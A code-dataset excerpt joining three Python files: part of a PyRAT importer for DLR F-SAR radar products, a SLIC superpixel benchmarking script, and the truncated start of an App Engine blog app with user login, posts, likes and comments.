# barr[k, ...] *= mask
if self.product == 'RGI-SLC':
ppfile = f.replace('RGI-SR', 'RGI-RDP').replace('slc_', 'pp_').replace('.rat', '.xml')
if self.product == 'RGI-AMP':
ppfile = f.replace('RGI-SR', 'RGI-RDP').replace('amp_', 'pp_').replace('.rat', '.xml')
if self.product == 'INF-SLC':
ppname = 'pp_' + '_'.join(os.path.basename(f).split('_')[-3:]).replace('.rat', '.xml')
ppfile = os.path.join(self.dir, src[0], 'INF-RDP', ppname)
if self.product == 'INF-CIR':
ppname = 'ppgeo_csar_' + '_'.join(os.path.basename(f).split('_')[1:4]) + '.xml'
ppfile = os.path.join(self.dir, 'GTC', 'GTC-RDP', ppname)
pp = Xml2Py(ppfile)
bmeta['CH_pol'][k] = pp.polarisation
if self.sym is True and barr.ndim == 3 and barr.shape[0] == 4:
pol = bmeta['CH_pol']
idx_hh = pol.index('HH')
idx_vv = pol.index('VV')
idx_hv = pol.index('HV')
idx_vh = pol.index('VH')
barr[idx_hv, ...] = (barr[idx_hv, ...] + barr[idx_vh, ...]) / np.sqrt(2)
barr = np.delete(barr, idx_vh, axis=0)
bmeta['CH_pol'][idx_hv] = 'XX'
bmeta['CH_pol'].remove('VH')
bmeta['prf'] = pp.prf
bmeta['c0'] = pp.c0
bmeta['rd'] = pp.rd
bmeta['rsf'] = pp.rsf
bmeta['nrg'] = drg
bmeta['naz'] = daz
bmeta['lam'] = pp['lambda']
bmeta['band'] = pp.band
bmeta['antdir'] = pp.antdir
bmeta['v0'] = pp.v0
bmeta['bw'] = pp.cbw
bmeta['ps_rg'] = pp.ps_rg
bmeta['ps_az'] = pp.ps_az
bmeta['rd'] += block[2] / bmeta['rsf']
bmeta['h0'] = pp.h0
bmeta['pre_az'] = pp.pre_az
bmeta['terrain'] = pp.terrain
if self.mask is True:
array.append([barr, mask])
else:
array.append(barr)
meta.append(bmeta)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@classmethod
def guirun(cls, viewer):
para_backup = copy.deepcopy(cls.para) # keep a deep copy of the default parameters
wid = FsarImportWidget()
wid.update()
res = wid.exec_()
if res == 1:
plugin = cls(dir=wid.dir, product=wid.product, bands=wid.bands, polarisations=wid.polar, crop=wid.crop, sym=wid.sym)
viewer.statusBar.setMessage(message=plugin.name + ' running', colour='R')
plugin.run()
del plugin
viewer.statusBar.setMessage(message='Ready', colour='G')
viewer.updateViewer()
class FsarImportWidget(QtWidgets.QDialog):
def __init__(self, parent=None, dir=None):
super(FsarImportWidget, self).__init__(parent)
self.setWindowTitle("FSAR import")
mainlayout = QtWidgets.QVBoxLayout(self)
self.dirwidget = FileselWidget(title='FSAR product dir', type='opendir')
self.dirwidget.setvalue(dir)
mainlayout.addWidget(self.dirwidget)
mainlayout.addWidget(HLine())
self.productwidget = ProductContentWidget(products=["RGI-SLC", "RGI-AMP", "INF-SLC"])
mainlayout.addWidget(self.productwidget)
mainlayout.addWidget(HLine())
self.cropwidget = CropBoxWidget(title='Select crop (0=maximum)')
mainlayout.addWidget(self.cropwidget)
mainlayout.addWidget(HLine())
self.symwidget = BoolWidget(text="Cross-polar symmetrisation")
mainlayout.addWidget(self.symwidget)
self.buttons = QtWidgets.QDialogButtonBox(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel,
QtCore.Qt.Horizontal, self)
mainlayout.addWidget(self.buttons)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.dirwidget.text.textChanged.connect(lambda: self.update(mode=0)) # update all
self.bandupdate = lambda: self.update(mode=2) # update band
self.productwidget.product.currentIndexChanged.connect(lambda: self.update(mode=1)) # update product
self.productwidget.band.currentIndexChanged.connect(self.bandupdate)
def update(self, mode=0):
self.dir = str(self.dirwidget.getvalue())
self.product = self.productwidget.getvalue(0)
self.bands = self.productwidget.getvalue(1)
self.polar = self.productwidget.getvalue(2)
if self.product == 'RGI-SLC':
head = 'slc'
src = ('RGI', 'RGI-SR')
code_pos = 2
if self.product == 'RGI-AMP':
head = 'amp'
src = ('RGI', 'RGI-SR')
code_pos = 2
if self.product == 'INF-SLC':
head = 'slc_coreg'
src = ('INF', 'INF-SR')
code_pos = 4
files = glob.glob(
os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + self.polar.lower() + '*.rat'))
if mode == 0:
allfiles = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*.rat'))
self.bands = '*'
self.polar = '*'
if mode == 1:
allfiles = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*.rat'))
if mode == 2:
allfiles = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
# allfiles = glob.glob(os.path.join(self.dir,'RGI','RGI-SR',head+'*.rat'))
allbands = list(set([os.path.basename(slc).split('_')[code_pos][0] for slc in allfiles]))
allpols = list(set([os.path.basename(slc).split('_')[code_pos][1:3].upper() for slc in allfiles]))
nrg = 0
naz = 0
for filename in files:
lun = RatFile(filename)
nrg = max(nrg, lun.shape[1])
naz = max(naz, lun.shape[0])
self.cropwidget.setrange([[0, naz], [0, naz], [0, nrg], [0, nrg]])
self.cropwidget.setvalues([0, naz, 0, nrg])
if mode == 0 or mode == 1:
self.productwidget.band.currentIndexChanged.disconnect(self.bandupdate)
self.productwidget.updatepolar(allpols)
self.productwidget.updatebands(allbands)
self.productwidget.setvalue(1, self.bands)
self.productwidget.setvalue(2, self.polar)
self.productwidget.band.currentIndexChanged.connect(self.bandupdate)
elif mode == 2:
self.productwidget.updatepolar(allpols)
self.productwidget.setvalue(2, self.polar)
def accept(self):
self.product = self.productwidget.getvalue(0)
self.bands = self.productwidget.getvalue(1)
self.polar = self.productwidget.getvalue(2)
self.crop = self.cropwidget.getvalues()
self.sym = self.symwidget.getvalue()
super(FsarImportWidget, self).accept()
@pyrat.docstringfrom(FSAR)
def fsar(*args, **kwargs):
return FSAR(*args, **kwargs).run(*args, **kwargs)
class FSAR_dem(pyrat.ImportWorker):
"""
Import of DLR F-SAR SLC product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_dem, self).__init__(*args, **kwargs)
self.name = "FSAR DEM IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'slantdem_full'
src = ('RGI', 'RGI-AUX')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[2][1:3] for slc in files]))
array = []
meta = []
meta.append({})
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(barr)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_dem)
def fsar_dem(*args, **kwargs):
return FSAR_dem(*args, **kwargs).run(*args, **kwargs)
class FSAR_offnadir(pyrat.ImportWorker):
"""
Import of DLR F-SAR SLC product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_offnadir, self).__init__(*args, **kwargs)
self.name = "FSAR OFFNADIR IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'offnadir'
src = ('RGI', 'RGI-AUX')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[2][1:3] for slc in files]))
array = []
meta = []
meta.append({})
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(np.squeeze(barr))
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_offnadir)
def fsar_offnadir(*args, **kwargs):
return FSAR_offnadir(*args, **kwargs).run(*args, **kwargs)
class FSAR_phadem(pyrat.ImportWorker):
"""
Import of DLR F-SAR DEM PHASE product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param suffix: An optional suffix appended to the INF directory (i.e. INF_<suffix>)
:type suffix: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'suffix', 'value': ''},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_phadem, self).__init__(*args, **kwargs)
self.name = "FSAR DEM PHASE IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'pha_dem'
src = ('INF' + ('_' + self.suffix if len(self.suffix) > 0 else ''), 'INF-SR')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
array = []
meta = [{}]
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(barr)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_phadem)
def fsar_phadem(*args, **kwargs):
return FSAR_phadem(*args, **kwargs).run(*args, **kwargs)
class FSAR_kz(pyrat.ImportWorker):
"""
Import of DLR F-SAR KZ interferometric product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param suffix: An optional suffix appended to the INF directory (i.e. INF_<suffix>)
:type suffix: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'suffix', 'value': ''},
{'var': 'sym', 'value': False, 'type': 'bool', 'text': 'Cross-polar symmetrisation'},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_kz, self).__init__(*args, **kwargs)
self.name = "FSAR KZ IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'kz'
src = ('INF' + ('_' + self.suffix if len(self.suffix) > 0 else ''), 'INF-SR')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*'
+ self.bands.upper() + self.polarisations.lower() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[3][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[3][1:3] for slc in files]))
array = []
meta = []
meta.append({})
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
if self.sym is True and len(bandfiles) == 4: # Remove HV channel (data was symmetrised)
for slc in bandfiles:
if os.path.basename(slc).split('_')[3][1:3] == 'vh':
bandfiles.remove(slc)
fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(barr)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_dem)
def fsar_kz(*args, **kwargs):
return FSAR_kz(*args, **kwargs).run(*args, **kwargs)
class FSAR_track(pyrat.ImportWorker):
"""
Import of DLR E-SAR REF/REALTRACK products
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'crop', 'value': [0, 0, 0, 0]}]
def __init__(self, *args, **kwargs):
super(FSAR_track, self).__init__(*args, **kwargs)
self.name = "FSAR REAL/REF TRACK IMPORT"
self.block = 'T'
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
sys = pyrat.data.getAnnotation()
pre_az = sys['pre_az'] # pressuming in azimuth factor
if self.product == 'RGI-SLC':
# head = 'reftr_sar_resa'
head = '_sar_resa'
src = ('RGI', 'RGI-TRACK')
if self.product == 'RGI-AMP':
# head = 'reftr_sar_resa'
head = '_sar_resa'
src = ('RGI', 'RGI-TRACK')
if self.product == 'INF-SLC':
# head = 'reftr_sar_resa'
head = '_sar_resa'
src = ('INF', 'INF-TRACK')
if self.product == 'INF-CIR':
# head = 'reftr_sar_resa'
head = 'track_loc'
src = ('GTC', 'GTC-AUX')
files = glob.glob(os.path.join(self.dir, src[0], src[1],
'*' + head + '*' + self.bands.upper() + self.polarisations.lower() + '*.rat'))
if self.product == 'INF-CIR':
bands = list(set([os.path.basename(slc).split('_')[3][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[3][1:3] for slc in files]))
tracks = list(set([os.path.basename(slc).split('_')[0][0:6] for slc in
files])) # contains the path to the 2 track files (reference and real)
else:
bands = list(set([os.path.basename(slc).split('_')[4][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[4][1:3] for slc in files]))
tracks = list(set([os.path.basename(slc).split('_')[0][0:6] for slc in
files])) # contains the path to the 2 track files (reference and real)
array = []
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f] # list of files from the same band
fil = RatFile(bandfiles[0])
naz = fil.shape[-2]
block = list(self.crop)
block[2] = 0
block[3] = 7
if block[1] == 0:
block[1] = naz
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles) / 2, sys['pre_az'] * daz, 7))
for k, pol in enumerate(pols):
polfiles = [f for f in bandfiles if pol + '_' in f]
for i, f in enumerate(polfiles):
logging.info("Found " + f)
if 'reftr' in f:
barr[k, :, 0:3] = RatFile(f).read(block=(pre_az * block[0], 1, pre_az * daz, 3)).T
barr[k, :, 6] = RatFile(f).read(block=(pre_az * block[0], 0, pre_az * daz, 1))
elif 'track' in f:
barr[k, :, 3:6] = RatFile(f).read(block=(pre_az * block[0], 1, pre_az * daz, 3)).T
if self.product == 'INF-SLC': # read multisquit if existing
dir = f.split('INF/INF-TRACK/track_sar_resa')[0] + 'INF/INF-AUX/'
master = f.split('_')[-3]
band = f.split('_')[-2][0]
ms_files = glob.glob(dir + 'baseline_error_*' + master + '*' + band + '*.rat')
for msf in ms_files:
if 'constLin' in msf:
logging.info('Mutisquint const/linear update found!')
ms_corr = RatFile(msf).read()
x = barr[k, :, 3] - barr[k, 0, 3]
barr[k, :, 4] -= (ms_corr[0] + x * ms_corr[1])
barr[k, :, 5] -= (ms_corr[2] + x * ms_corr[3])
else:
logging.info('Mutisquint baseline correction found!')
ms_corr = RatFile(msf).read()[..., block[0]:block[0] + daz]
dy = np.sum(ms_corr[1, ...], axis=0)
dz = np.sum(ms_corr[2, ...], axis=0)
barr[k, :, 4] += np.resize(dy, pre_az * daz)
barr[k, :, 5] += np.resize(dz, pre_az * daz)
array.append(barr[:, 0:pre_az * daz:pre_az, :])
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], None
else:
return array, None
@pyrat.docstringfrom(FSAR_track)
def fsar_track(*args, **kwargs):
return FSAR_track(*args, **kwargs).run(*args, **kwargs)
| mpl-2.0 | 8,396,901,994,008,392,000 | 39.570432 | 128 | 0.493176 | false |
blowekamp/itkSuperPixel | doc/scripts/evaluation_ski.py | 1 | 1526 | #!/usr/bin/env python
import SimpleITK as sitk
import skimage as ski
import skimage.segmentation
import numpy as np
import timeit
def mask_label_contour(image, seg):
"""Combine an image and segmentation by masking the segmentation contour.
For an input image (scalar or vector), and a multi-label
segmentation image, creates an output image where the countour of
each label masks the input image to black."""
return sitk.Mask(image, sitk.LabelContour(seg+1)==0)
# this script generates images to compare ski-image SLIC
# implementaiton vs ours.
# We have slightly different parameterizations. The image is 512x512,
# if we target 256 superpixels of size 32x32 we have simular
# parameters for each implementation.
img=sitk.ReadImage("/home/blowekamp/src/scikit-image/skimage/data/astronaut.png")
aimg_lab=ski.color.rgb2lab(sitk.GetArrayFromImage(img))
ski_slic_aimg=skimage.segmentation.slic(aimg_lab,n_segments=256,convert2lab=False)
sitk.WriteImage(mask_label_contour(img, sitk.GetImageFromArray(ski_slic_aimg))
, "astronaut_ski_slic.png")
print(min(timeit.repeat(lambda: skimage.segmentation.slic(aimg_lab,n_segments=256,convert2lab=False), number=1, repeat=5)))
img_lab = sitk.GetImageFromArray(aimg_lab, isVector=True)
sitk_slic_img=sitk.SLIC(img_lab, [32,32], maximumNumberOfIterations=10)
sitk.WriteImage(mask_label_contour(img, sitk_slic_img), "astronaut_sitk_slic.png")
print(min(timeit.repeat(lambda: sitk.SLIC(img_lab, [32,32], maximumNumberOfIterations=10), number=1, repeat=5)))
| apache-2.0 | 9,084,854,102,051,266,000 | 32.173913 | 123 | 0.773919 | false |
escolmebartlebooth/fsnd_blogs | main.py | 1 | 21055 | # imports start
import os
import jinja2
import webapp2
import re
import bb_blogdb as bdb
import logging
# end imports
# create jinja2 environment
TEMPLATE_DIR = os.path.join(os.path.dirname(__file__), 'templates')
JINJA_ENV = jinja2.Environment(loader=jinja2.FileSystemLoader(TEMPLATE_DIR),
autoescape=True)
class Handler(webapp2.RequestHandler):
""" a baseic handler to render pages and handle events """
def write(self, *a, **kw):
self.response.out.write(*a, **kw)
def render_str(self, template, **params):
t = JINJA_ENV.get_template(template)
return t.render(params)
def render(self, template, **kw):
self.write(self.render_str(template, user=self.user, **kw))
def login(self, username, password):
"""
try to login
if successful write a secure cookie to the browser
"""
user = None
e = {}
# if the username isn't blank, continue, else fail
if username:
# as the User Entity if the username and password are valid
user = bdb.BlogUser.login(username, password)
# if the user is good, then set a cookie on the site
if user:
self.set_secure_cookie('user_id', str(user.key.id()))
else:
e = {'error': 'invalid login'}
return (user, e)
def signup(self, username, password, verify, email):
"""
test that values are valid
then register the user and then login
"""
# create checkers
user_re = re.compile(r"^[a-zA-Z0-9_-]{3,20}$")
password_re = re.compile(r"^.{3,20}$")
email_re = re.compile(r"^[\S]+@[\S]+.[\S]+$")
user = None
e = {}
# is the username a valid style?
if not (username and user_re.match(username)):
e['username'] = 'invalid username'
# is the password a valid style and does it match the verify?
if not (password and user_re.match(password)):
e['password'] = 'invalid password'
elif (password != verify):
e['verify'] = 'passwords must match'
# if provided, is the email a valid style?
if (email and not email_re.match(email)):
e['email'] = 'invalid email'
# if all looks well, register the user
if not e:
user = bdb.BlogUser.signup(username, password, email)
if user:
# if registered successfully, log the user in
self.set_secure_cookie('user_id', str(user.id()))
else:
e['username'] = 'username exists'
return (user, e)
def blog_exists(self, blog_id=None):
"""
helper to determine if a blog id is valid
return the blog entity if it exists
otherwise return None
"""
try:
blog = bdb.BlogPost.by_id(int(blog_id))
return blog
except (TypeError, ValueError):
return None
def user_owns_blog(self, user=None, blog=None):
""" helper to determine if a user owns the blog """
if (user.key == blog.userkey):
return True
else:
return False
def user_owns_comment(self, user=None, blog=None, comment_id=None):
"""
helper function to check that the user owns the comment
try to cast the id as an integer
then check if the comment is owned by the user
return true if the user does own the user
"""
try:
# is the comment id an integer
comment_id = int(comment_id)
if (user.key == blog.comments[comment_id].userkey):
# the user does own the comment
return True
else:
return False
except:
# bad comment id
return False
def delete_blog(self, user=None, blog=None):
""" check that the user owns the blog and if so delete it """
if self.user_owns_blog(user, blog):
return bdb.BlogPost.delete_blog(blog)
else:
return None
def set_secure_cookie(self, name, val):
"""
create a secure cookie from the passed value
and store against the name
"""
cookie_val = bdb.make_secure_val(val)
self.response.headers.add_header('Set-Cookie',
"{}={}; Path=/".format(name,
cookie_val))
def read_secure_cookie(self, name):
""" read the cookie from the browser """
cookie_val = self.request.cookies.get(name)
return cookie_val and bdb.check_secure_val(cookie_val)
def initialize(self, *a, **kw):
""" used to access the user cookie and store against the handler """
webapp2.RequestHandler.initialize(self, *a, **kw)
user_id = self.read_secure_cookie('user_id')
self.user = user_id and bdb.BlogUser.by_id(int(user_id))
class blog(Handler):
""" handler for the main app page to display and edit blogs """
def render_blog(self, **kw):
self.render("blog.html", **kw)
def get(self):
""" get the ten most recent blog entries and render the page """
blogs = bdb.BlogPost.get_blogs(10)
self.render_blog(pagetitle="welcome to bartlebooth blogs",
blogs=blogs, e=None, viewpost=False)
def post(self):
""" process the delete form that is on the blog main page """
# get the blog id from the form entries
blog_id = self.request.get('blog_id')
if self.user:
# the user is logged in, does the blog exist?
blog = self.blog_exists(blog_id)
# form value is DELETE and the blog exists
if blog and self.request.get('blogdelete'):
# pass deletion to a common handler
self.delete_blog(self.user, blog)
# re-render the blogs page
self.redirect('/blog')
else:
# user isn't logged in so show the login page
self.redirect('/blog/login')
class blogedit(Handler):
""" Handle updates to blog posts """
def render_editpost(self, **kw):
self.render("editpost.html", **kw)
def get(self, blog_id):
"""
get the blog from the query parameter
check user owns the blog
"""
if self.user:
# user valid
blog = self.blog_exists(blog_id)
if blog and self.user_owns_blog(self.user, blog):
# blog is valid and owned by the user so render the edit form
self.render_editpost(pagetitle="edit post", blog=blog, e=None)
else:
# TO DO SHOW ERROR ON REFERRER FORM?
self.redirect(self.request.referer)
else:
# not logged in so show the login page
self.redirect('/blog/login')
def post(self, post_id):
"""
Check the user, blog and subject/comment entries
then post or fail the edit
"""
# get the form values from the edit post
blog_id = self.request.get("blog_id")
subject = self.request.get("subject")
posting = self.request.get("posting")
if self.user:
# user valid
blog = self.blog_exists(blog_id)
# test blog exists and the user owns the form
if blog and self.user_owns_blog(self.user, blog):
if (subject and posting):
# save the edit and redirect to blog post
bdb.BlogPost.edit_blog(blog=blog, subject=subject,
posting=posting)
self.redirect('/blog/{}'.format(str(blog_id)))
else:
# subject and posting shouldn't be empty so error
e = {'posterror': 'subject and posting must not be empty'}
self.render_editpost(pagetitle="edit post",
blog=blog, e=e)
else:
# TO DO - SHOULD THIS BE AN ERROR?
self.redirect('/blog')
else:
self.redirect('/blog/login')
class logout(Handler):
"""
Handle a GET to the /blog/logout page
"""
def get(self):
""" clear the user_id cookie if the User is set """
if self.user:
self.response.headers.add_header('Set-Cookie', "user_id=; Path=/")
self.redirect("/blog")
class signup(Handler):
"""
Handler to process a sign up request
either log the user in or error
"""
def render_signup(self, **kw):
self.render("signup.html", **kw)
def get(self):
""" pass to handler function """
self.render_signup(pagetitle="signup to bartlebooth blogs",
items=None, e=None)
def post(self):
"""
capture form input
then pass to base handler to verify signup
"""
username = self.request.get('username')
password = self.request.get('password')
verify = self.request.get('verify')
email = self.request.get('email')
# check if user signup is ok
user, e = self.signup(username, password, verify, email)
# if ok, show the welcome page to the new user and log the user in
if user:
self.redirect("/blog/welcome")
else:
# else show an error set on the signup page
items = {'username': username, 'email': email}
self.render_signup(pagetitle="signup to bartlebooth blogs",
items=items, e=e)
class login(Handler):
"""
Handler which renders a login page
then processes the input to log a user in
"""
def render_login(self, **kw):
self.render("login.html", **kw)
def get(self):
self.render_login(pagetitle="login to bartlebooth blogs",
items=None, e=None)
def post(self):
"""
Process the Login form input
either log the user in or report errors
"""
# capture form values
username = self.request.get('username')
password = self.request.get('password')
# check if user valid
user, e = self.login(username, password)
# if valid, show the welcome page and login the user
if user:
self.redirect("/blog/welcome")
else:
# if not valid return error
items = {'username': username}
self.render_login(pagetitle="login to bartlebooth blogs",
items=items, e=e)
class welcome(Handler):
""" Handler to display a welcome page if a user is logged in """
def render_welcome(self, **kw):
self.render("welcome.html", **kw)
def get(self):
"""
check if valid user and render page
otherwise direct to login
"""
if self.user:
# pass to handler function
page_title = "welcome to bb blogs {}".format(self.user.username)
self.render_welcome(pagetitle=page_title)
else:
# pass to login page if not a valid user
self.redirect("/blog/login")
class newpost(Handler):
"""
Handles authentication and rendering of new post page
Handles the processing of the new post itself
"""
def render_newpost(self, **kw):
self.render("newpost.html", **kw)
def get(self):
"""
check if valid user and render page
otherwise direct to login
"""
if self.user:
# the user is valid so render the new post page
self.render_newpost(pagetitle="new post", items=None, e=None)
else:
# the user isn't valid so pass to login page
self.redirect("/blog/login")
def post(self):
"""
Captures the new post parameters
Checks for validity and creates the new post
"""
# get input and logged on user
subject = self.request.get('subject')
posting = self.request.get('posting')
if not self.user:
# if the user isn't valid, go to the login page
self.redirect("/blog/login")
elif not subject or not posting:
# if either subject or post is empty, raise an error
e = {'error': "Subject and Post cannot be blank"}
items = {'subject': subject, 'posting': posting}
self.render_newpost(pagetitle="new post", items=items, e=e)
else:
post = bdb.BlogPost.new_post(self.user,
subject, posting)
self.redirect("/blog/{}".format(str(post.id())))
class viewpost(Handler):
""" handler to display an individual blog entry """
def render_viewpost(self, **kw):
self.render("viewpost.html", **kw)
def get(self, blog_id):
"""
get the blog_id on the query string and test it's validity
if ok, show the blog, if not sliently redirect to the /blog page
"""
blog = self.blog_exists(blog_id)
if blog:
# blog exists so show the view page
self.render_viewpost(pagetitle="post: {}".format(blog.subject),
blog=blog, e=None, viewpost=True)
else:
self.redirect("/blog")
def post(self, post_id):
""" handler for the multiple forms on the view page """
# get the blog id
blog_id = self.request.get('blog_id')
blog = self.blog_exists(blog_id)
# user is valid
if self.user and blog:
# test if deletion request
if self.request.get('blogdelete'):
# pass deletion to a common handler
self.delete_blog(self.user, blog)
# re-direct to blog
self.redirect("/blog")
else:
# not logged in so show login page
self.redirect('/blog/login')
class bloglike(Handler):
""" handler to manage the actions of liking a blog """
def post(self):
"""
check if the user is logged in
check if the user owns the blog
check if this user has liked/disliked this blog
update the like / dislike
"""
blog_id = self.request.get('blog_id')
blog = self.blog_exists(blog_id)
# check whether its a like or dislike request
if self.request.get('like'):
like_action = True
elif self.request.get('dislike'):
like_action = False
# see if the user is logged in
if self.user and blog:
# does the user owns the blog
if not (bdb.BlogLike.like_exists(self.user, blog) or
self.user_owns_blog(self.user, blog)):
# post the like with the like action
bdb.BlogPost.like_blog(self.user, blog, like_action)
# go to post
self.redirect('/blog/{}'.format(int(blog_id)))
else:
# bad user id or blog, show login
self.redirect('/blog/login')
class blogcomment(Handler):
""" handler to manage commenting on a blog """
def get(self, blog_id):
""" test whether logged in and not owner """
blog = self.blog_exists(blog_id)
if self.user and blog:
if not self.user_owns_blog(self.user, blog):
# postcomment True means a textarea will show on the viewpost
e = {'postcomment': True}
else:
e = {'error': 'you own the blog so cannot comment'}
# show page
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# bad user id or blog
self.redirect('/blog/login')
def post(self, blog_id):
""" save the comment if logged in and the comment is ok """
blog = self.blog_exists(blog_id)
if self.user and blog:
# user is logged in
if not self.user_owns_blog(self.user, blog):
comment = self.request.get('comment')
if comment:
# comment isn't empty
bdb.BlogPost.add_comment(self.user, blog, comment)
e = None
else:
e = {'error': 'comment cannot be blank'}
else:
e = {'error': 'you own the blog'}
# render the page
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# user not logged in or bad blog
self.redirect('/blog/login')
class blogdeletecomment(Handler):
""" handler to manage deleting a comment on a blog """
def post(self):
""" test whether logged in and not owner """
# get form values if a delete comment request
if (self.request.get('deletecomment')):
blog_id = self.request.get('blog_id')
